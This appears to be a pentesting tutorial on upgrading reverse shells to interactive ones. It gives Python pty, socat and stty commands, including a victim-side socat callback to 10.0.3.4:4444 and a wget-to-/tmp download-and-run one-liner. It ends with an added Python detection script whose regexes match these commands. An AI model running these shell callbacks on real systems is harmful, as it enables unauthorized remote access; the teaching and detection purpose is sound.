Upgrading Shells

A guide to upgrading shells from non-interactive to interactive.

Python

python -c 'import pty; pty.spawn("/bin/bash")'
Upgrading the shell to interactive with Python

Socat

On Kali (Attacking Machine)

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Using Socat to Upgrade the shell

On Victim Machine with no Socat

We will need to download a precompiled socat binary from https://github.com/andrew-d/static-binaries. We then download the chosen binary into a folder that we have read and write control over.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Upgrading with Magic

We can upgrade a shell with "magic". The shell will be fully interactive and have synta

The first step is to get the shell while in a bash command prompt (this cannot be done in ZSH; switch the shell with /bin/bash before connecting to the shell).

Then upgrade it with the Python trick.

Upgrade the shell with Python

We then background the shell with Ctrl + Z.

backgrounding with ctrl z

We then issue the commands on our Kali machine, making sure to take note of the values, as we will need them for input on the victim machine.

We then foreground the shell with fg and enter the commands to reset the console.

resetting the termina

The commands

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
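
Seen from the target host, the commands in this guide leave recognisable process command lines. The following added example (not part of the original guide) matches them in process-execution records; the rule names and the sample records, including the example.invalid URL, are constructed for illustration.

```python
import re

# Rule name -> pattern over one process command line. The rule names are made
# up for this example; the patterns mirror the commands shown in this guide.
RULES = {
    # python -c 'import pty; pty.spawn("/bin/bash")'
    "python_pty_spawn": re.compile(r"\bpython[\d.]*\b.*\s-c\s.*\bpty\.spawn\s*\("),
    # socat exec:'bash -li',pty,... tcp:<host>:<port>
    "socat_exec_pty_tcp": re.compile(
        r"\bsocat\b(?=.*\bexec:)(?=.*[,\s]pty\b)"
        r"(?=.*\btcp\d?(?:-connect)?:[^\s,]+:\d+)", re.I),
    # wget -O / curl -o writing into a world-writable directory
    "download_to_tmp": re.compile(
        r"\b(?:wget|curl)\b.*\s-[oO]\s*(?:/tmp|/var/tmp|/dev/shm)/\S+"),
    # a program started directly from a world-writable directory
    "exec_from_tmp": re.compile(r"^(?:/tmp|/var/tmp|/dev/shm)/\S+"),
}

def match_rules(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(records):
    """Map each (pid, cmdline) record that matches any rule to its rule names."""
    hits = {}
    for pid, cmdline in records:
        names = match_rules(cmdline)
        if names:
            hits[pid] = names
    return hits

# Constructed sample records (pid, argv joined by spaces), in the form an
# execve audit log reports them: shell quoting is already stripped.
SAMPLE = [
    (4101, 'python -c import pty; pty.spawn("/bin/bash")'),
    (4102, "wget -q https://example.invalid/socat -O /tmp/socat"),
    (4103, "chmod +x /tmp/socat"),
    (4104, "/tmp/socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444"),
    (4105, "python3 manage.py runserver"),           # benign python
    (4106, "socat -u /var/log/app.log tcp:10.0.3.9:514"),  # benign socat relay
]

if __name__ == "__main__":
    for pid, names in triage(SAMPLE).items():
        print(pid, ", ".join(names))
```

The socat rule requires exec:, pty and an outbound tcp: address together, so ordinary socat relays and the listener side of this guide do not match.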
